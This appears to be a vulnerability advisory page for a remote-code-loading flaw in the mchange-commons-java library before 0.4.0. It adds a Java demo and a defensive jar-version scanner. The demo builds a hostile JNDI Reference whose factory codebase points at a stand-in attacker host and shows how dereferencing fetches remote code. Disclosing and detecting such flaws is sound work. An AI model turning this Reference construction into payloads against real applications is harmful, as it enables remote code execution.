CVE-2026-27727
Published: 25 February 2026
Description
mchange-commons-java, a library that provides Java utilities, includes code that mirrors early implementations of JNDI functionality, including support for remote `factoryClassLocation` values, by which code can be downloaded and invoked within a running application. If an attacker can provoke an application to read a maliciously crafted `javax.naming.Reference` or serialized object, they can cause the download and execution of malicious code. The JDK's implementation of this functionality was disabled by default behind a System property, `com.sun.jndi.ldap.object.trustURLCodebase`, which defaults to `false`. However, since mchange-commons-java includes an independent implementation of JNDI dereferencing, libraries (such as c3p0) that resolve references via that implementation could be provoked to download and execute malicious code even after the JDK was hardened. Mirroring the JDK patch, mchange-commons-java's JNDI functionality is gated by configuration parameters that default to restrictive values starting in version 0.4.0. No known workarounds are available. Versions prior to 0.4.0 should be avoided on application CLASSPATHs.
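To make the mechanism concrete, the following is an added illustration (not code from mchange-commons-java, c3p0 or this advisory) of how the JDK's own javax.naming.spi.NamingManager treats a Reference whose object factory is to be fetched from a remote codebase. Only the JDK-side path is exercised here; mchange-commons-java's independent dereferencing code, which this CVE concerns, and its 0.4.0 configuration parameters are not named on this page and are not used below. The factory class name and codebase URL are invented for the demo, and the serialization round-trip stands in for the "serialized object" vector described above.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.Hashtable;
import javax.naming.Reference;
import javax.naming.spi.NamingManager;

/**
 * Added demo, not part of mchange-commons-java: shows how the JDK's NamingManager
 * handles a Reference that points at a remote factoryClassLocation, and how the
 * com.sun.jndi.ldap.object.trustURLCodebase property gates the remote class load.
 */
public class ReferenceCodebaseDemo {

    /** The kind of Reference an attacker would plant: the object factory lives on a remote codebase. */
    static Reference hostileReference() {
        return new Reference(
                "javax.sql.DataSource",                 // type the reference claims to describe
                "com.example.evil.PayloadFactory",      // factoryClassName (hypothetical, not on the local class path)
                "http://attacker.example.invalid/");    // factoryClassLocation: remote codebase (hypothetical)
    }

    /** A Reference is Serializable, so it can equally arrive inside a serialized object stream. */
    static Reference roundTrip(Reference ref) throws Exception {
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        try (ObjectOutputStream oos = new ObjectOutputStream(bos)) {
            oos.writeObject(ref);
        }
        try (ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(bos.toByteArray()))) {
            return (Reference) ois.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        Reference ref = roundTrip(hostileReference());
        System.out.println("factoryClassLocation = " + ref.getFactoryClassLocation());
        System.out.println("com.sun.jndi.ldap.object.trustURLCodebase = "
                + System.getProperty("com.sun.jndi.ldap.object.trustURLCodebase", "<unset, treated as false>"));

        // JDK dereferencing path: the factory class is looked up on the local class path first;
        // the remote codebase is consulted only when trustURLCodebase is "true".
        Object result = NamingManager.getObjectInstance(ref, null, null, new Hashtable<>());

        if (result == ref) {
            System.out.println("No factory loaded; the Reference was returned unchanged.");
        } else {
            System.out.println("Factory ran and produced: " + result.getClass().getName());
        }
    }
}
```

Run with `java ReferenceCodebaseDemo` on any JDK that carries the trustURLCodebase gate (8u121 onwards) and the Reference comes back untouched with no network activity. Re-run with `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true` and the JDK builds a URLClassLoader over the codebase and attempts to fetch the factory class; against the unresolvable `.invalid` host that attempt fails and the Reference is again returned unchanged, but the outbound connection attempt is visible to a packet capture or strace. That attempt is exactly what a dereferencing implementation outside the JDK, such as the one in mchange-commons-java before 0.4.0, would make regardless of the property.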
Mitigating Controls (NIST 800-53 r5) [AI-generated]
SI-2 (Flaw Remediation) directly addresses this CVE: it mandates timely patching, here an upgrade to mchange-commons-java 0.4.0 or later, where JNDI dereferencing defaults to restrictive settings.
SA-22 (Unsupported System Components) requires replacing or removing components that are no longer maintained; applied to third-party dependencies, it keeps superseded pre-0.4.0 mchange-commons-java builds, including those pulled onto the CLASSPATH by dependents such as c3p0, out of deployed applications.
RA-5 (Vulnerability Monitoring and Scanning) covers the scanning that identifies deployments carrying vulnerable mchange-commons-java versions, so remediation can be targeted.
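The scanning and flaw-remediation items above reduce in practice to one question: is an mchange-commons-java jar older than 0.4.0 on the CLASSPATH? The following is an added example (not a tool shipped by the mchange projects or referenced by this advisory) that answers it for the jars on a class path. It assumes the jar carries Maven's standard `META-INF/maven/com.mchange/mchange-commons-java/pom.properties` entry and falls back to the jar file name when it does not; both the entry path and the file-name pattern are assumptions based on the library's Maven coordinates.

```java
import java.io.File;
import java.io.IOException;
import java.io.InputStream;
import java.util.ArrayList;
import java.util.List;
import java.util.Properties;
import java.util.jar.JarFile;
import java.util.regex.Matcher;
import java.util.regex.Pattern;
import java.util.zip.ZipEntry;

/**
 * Added example, not an official tool: flags mchange-commons-java jars older than 0.4.0.
 * Version is read from the Maven pom.properties inside the jar (assumed present),
 * with the jar file name as a fallback.
 */
public class MchangeCommonsJavaCheck {

    static final String POM_PROPERTIES =
            "META-INF/maven/com.mchange/mchange-commons-java/pom.properties";
    static final Pattern FILE_NAME =
            Pattern.compile("mchange-commons-java-(\\d+(?:\\.\\d+)*)(?:[-.].*)?\\.jar$");
    static final int[] FIXED_IN = {0, 4, 0};

    /** Numeric major.minor.patch from a Maven version string; qualifiers such as "-SNAPSHOT" are dropped. */
    static int[] numericParts(String version) {
        String[] fields = version.split("[-+]", 2)[0].split("\\.");
        int[] out = new int[3];
        for (int i = 0; i < out.length && i < fields.length; i++) {
            try {
                out[i] = Integer.parseInt(fields[i]);
            } catch (NumberFormatException e) {
                out[i] = 0;  // non-numeric field: treat as 0 so the comparison stays conservative
            }
        }
        return out;
    }

    /** True for every release before 0.4.0. A 0.4.0 pre-release qualifier is not flagged; inspect those by hand. */
    static boolean isVulnerable(String version) {
        int[] v = numericParts(version);
        for (int i = 0; i < FIXED_IN.length; i++) {
            if (v[i] != FIXED_IN[i]) {
                return v[i] < FIXED_IN[i];
            }
        }
        return false;
    }

    /** Version of mchange-commons-java packaged in the jar, or null if the jar is something else. */
    static String versionOf(File jar) throws IOException {
        try (JarFile jf = new JarFile(jar)) {
            ZipEntry e = jf.getEntry(POM_PROPERTIES);
            if (e != null) {
                Properties p = new Properties();
                try (InputStream in = jf.getInputStream(e)) {
                    p.load(in);
                }
                return p.getProperty("version");
            }
        }
        Matcher m = FILE_NAME.matcher(jar.getName());
        return m.find() ? m.group(1) : null;
    }

    public static void main(String[] args) throws IOException {
        // Scan the jars named on the command line, or the running JVM's own class path.
        String[] paths = args.length > 0
                ? args
                : System.getProperty("java.class.path").split(File.pathSeparator);
        List<String> findings = new ArrayList<>();
        for (String path : paths) {
            File f = new File(path);
            if (!f.isFile() || !f.getName().endsWith(".jar")) continue;
            String version = versionOf(f);
            if (version == null) continue;
            String verdict = isVulnerable(version) ? "VULNERABLE (< 0.4.0)" : "ok";
            findings.add(f.getPath() + " -> mchange-commons-java " + version + ": " + verdict);
        }
        if (findings.isEmpty()) {
            System.out.println("No mchange-commons-java jar found.");
        }
        findings.forEach(System.out::println);
    }
}
```

Invoke it as `java MchangeCommonsJavaCheck lib/*.jar` against an application's lib directory, or with no arguments from inside the application's own launch command to inspect the effective `java.class.path`. Because c3p0 depends on mchange-commons-java rather than the reverse, checking the mchange-commons-java jar alone is sufficient; a c3p0 upgrade only helps if it also brings the dependency to 0.4.0 or later.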
Security Summary [AI-generated]
CVE-2026-27727 is a critical vulnerability in the mchange-commons-java library, which provides Java utilities and includes an independent implementation mirroring early JNDI functionality. That implementation supports remote factoryClassLocation values in maliciously crafted javax.naming.Reference objects or serialized objects, allowing remote code to be downloaded and executed. The issue affects versions prior to 0.4.0 wherever the library is on the application CLASSPATH, including when it is pulled in transitively by dependents such as c3p0. Although the JDK's own JNDI dereferencing was hardened by defaulting com.sun.jndi.ldap.object.trustURLCodebase to false, mchange-commons-java's separate code is not governed by that property, so the JDK hardening does not protect it.
An attacker can exploit this remotely over the network with low complexity, requiring no privileges or user interaction (CVSS 9.8: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). By provoking an application to process a malicious Reference or serialized object, the attacker triggers the library to download and invoke arbitrary remote code, achieving full remote code execution (RCE) with high impact on confidentiality, integrity, and availability. The weakness is classified as CWE-74 (injection); exploitation targets applications using vulnerable versions of mchange-commons-java or dependents like c3p0.
Advisories recommend upgrading to mchange-commons-java version 0.4.0 or later, where JNDI functionality is gated by configuration parameters defaulting to restrictive values, mirroring the JDK's mitigation approach. No known workarounds exist, and versions prior to 0.4.0 should be removed from application CLASSPATHs. Relevant guidance appears in the library's security advisories and c3p0 documentation.
Details
- CWE(s): CWE-74
- Affected Products: mchange-commons-java, versions prior to 0.4.0 (including copies brought onto the CLASSPATH by dependents such as c3p0)
MITRE ATT&CK Enterprise Techniques [AI-generated]
Why these techniques?
The vulnerability enables remote code execution by exploiting a public-facing application via malicious JNDI-like Reference or serialized objects over the network, directly mapping to T1190: Exploit Public-Facing Application.